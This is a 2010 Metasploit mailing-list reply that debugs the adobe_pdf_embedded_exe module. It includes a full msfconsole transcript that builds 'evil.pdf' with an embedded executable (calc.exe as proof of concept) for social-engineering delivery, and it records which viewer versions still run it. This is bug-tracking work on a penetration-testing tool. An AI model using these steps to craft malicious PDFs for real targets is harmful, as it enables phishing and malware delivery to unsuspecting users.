Re: windows/fileformat/adobe_pdf_embedded_exe no more working

[Jonathan Cran <jcran () 0x0e org>]

On Wed, Mar 3, 2010 at 1:46 AM, Thomas Werth <security () vahle de> wrote:

> minor corrections:
>
> > As it is "just javascript" (correct me if i'm wrong) that is executed,
> > it should run browser independent ( i'm talking about executing custom
> > exe, not a payload). Or did i get something wrong here ?
>
> I wanted to write "viewer" independend. Don't know how "browser" made it
> into this sentence :)
>
> Am 03.03.2010 07:36, schrieb Thomas Werth:
> > Well i'm sorry this is not what i'm getting.
> >
> > In previous svn version it work like described even under foxitreader
> > and pdf xchangeviewer and Acrobat Reader.
> >
> > Latest Version claims (depending on viewer) about cmd.exe not found or
> > tries to execute *.pdf instead of *.exe
> >
> > As it is "just javascript" (correct me if i'm wrong) that is executed,
> > it should run browser independent ( i'm talking about executing custom
> > exe, not a payload). Or did i get something wrong here ?

Thomas,

Without doing the background research *shame* I believe you're correct about
the application using "just javascript" to execute the internal payload, or
at least javascript-like functionality. However, each viewer has almost
certainly implemented that javascript engine within their own product
independently, and has just as likely modified that implementation or
defaults) with all the controversy / problems around javascript+pdf.
However, it appears Adobe has not :) It's working okay here with:

* MS Windows XP Version 5.1.2600 Service Pack 3 Build 2600
* Adobe Reader 9.3.0
* Framework: 3.3.4-dev.8672
* Console  : 3.3.4-dev.8617
* Windows/Exec Payload (shouldn't matter)

* Exploit Transcript:

msf exploit(adobe_pdf_embedded_exe) > info

       Name: Adobe PDF Embedded EXE Social Engineering
    Version: 8380
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Colin Ames <amesc () attackresearch com>
  jduck <jduck () metasploit com>

Available targets:
  Id  Name
  --  ----
  0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  EXENAME     /tmp/calc.exe    no        The Name of payload exe.
  FILENAME    evil.pdf         no        The output filename.
  INFILENAME  /tmp/ms_eop.pdf  yes       The Input PDF filename.
  OUTPUTPATH  /tmp/            no        The location to output the file.

Payload information:
  Space: 2048

Description:
  This module embeds a Metasploit payload into an existing PDF file.
  The resulting PDF can be sent to a target as part of a social
  engineering attack.

msf exploit(adobe_pdf_embedded_exe) > exploit

[-] Exploit failed: The following options failed to validate: CMD.
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > set CMD cmd.exe
CMD => cmd.exe
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Reading in '/tmp/ms_eop.pdf'...
[*] Parsing '/tmp/ms_eop.pdf'...
[*] Parsing Successful.
[*] Using '/tmp/calc.exe' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /tmp/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >
msf exploit(adobe_pdf_embedded_exe) > version
Framework: 3.3.4-dev.8672
Console  : 3.3.4-dev.8617



PDF (evil.pdf) is then opened on target, and a prompt to save the file is
presented. PDF (ms_eop.pdf) is saved on the desktop, and a prompt to run the
internal executable is presented. Click 'okay' and calc.exe is presented.
great success :)

http://www.metasploit.com/redmine/issues/959 updated.

Hope it helps

jcran

jcran () metasploit com

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework